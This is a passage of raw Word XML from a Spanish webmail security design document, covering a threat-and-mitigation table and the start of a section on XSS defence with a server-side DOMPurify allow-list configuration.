            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@import</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zimbra bypass</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[51]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Adjuntos maliciosos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ejecutables disfrazados (.pdf.exe), macros Office, EICAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compromiso de endpoint, ransomware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restricción MIME-type stricta, magic numbers, ClamAV opcional, sandbox 25 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2025-68461</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[54]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Credenciales IMAP expuestas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dump de base de datos, backup no cifrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Acceso total a correos del usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AES-256-GCM a nivel de campo vía</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mongoose-aes-encryption</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, key 32 bytes, IV 12 bytes único</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[108]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[154]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Secuestro de sesión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS que roba</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">localStorage</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, sniffing de token JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Suplantación de identidad persistente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">BFF pattern: access token en memoria (15 min), refresh token en HttpOnly cookie + Redis server-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[44]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[57]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fuerza bruta / abuso de API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Login masivo, scraping de IMAP, DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bloqueo de cuentas, degradación de servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Redis sliding window (ZSET), 99.997% precisión, límites duales por IP y usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[48]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[67]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CRLF en argumentos de comando IMAP, Symbol poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ejecución de comandos IMAP arbitrarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Validación estricta con whitelist, stripping de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">\r</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">y</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">\n</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, uso de imapflow (no concatenación manual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-42258</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[47]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Subida de archivos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bypass de extensión, path traversal, archivos gigantes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RCE, llenado de disco, hosting de malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Límite 25 MB, magic numbers (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">file-type</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">), nombres UUID, almacenamiento S3 aislado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[89]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="133" w:name="Xabce807a21bb26834f61ee5b249546c2b1eb310"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.1 XSS via email: DOMPurify server-side + CSP estricto + sandboxed iframe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El ataque XSS representa la amenaza número uno contra clientes webmail porque el contenido HTML de un correo es, por definición, no confiable. La explotación de Roundcube por APT28 utilizó etiquetas SVG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;animate&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con handlers de eventos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onbegin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que el filtro existente no detectaba, permitiendo la ejecución de JavaScript en el contexto de la sesión del usuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[54]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[55]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 implementa tres capas independientes de protección:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Capa 1 — Sanitización server-side con DOMPurify.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Todo contenido HTML que transita por el backend se procesa mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">isomorphic-dompurify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(variante de DOMPurify que funciona en Node.js a través de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jsdom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">happy-dom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">por diferencias en el parsing de HTML que podrían introducir bypasses). DOMPurify, mantenido por Cure53, opera creando un nodo DOM, dejando que el navegador (o jsdom) parsee el HTML, y luego recorriendo el árbol DOM para eliminar elementos y atributos peligrosos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[69]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[64]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Es fundamentalmente más seguro que enfoques basados en expresiones regulares porque aprovecha el parser del navegador, evitando técnicas de obfuscación que engañan a regex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La configuración para el pipeline de email restringe drásticamente los elementos permitidos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOMPurify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'isomorphic-dompurify'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EMAIL_CONFIG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOWED_TAGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>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'br'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'strong'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'em'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'u'</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'h1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h5'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h6'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ul'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ol'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'li'</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'img'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'table'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'thead'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tbody'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tr'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'td'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'th'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'div'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'span'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blockquote'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pre'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'code'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hr'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sup'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sub'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
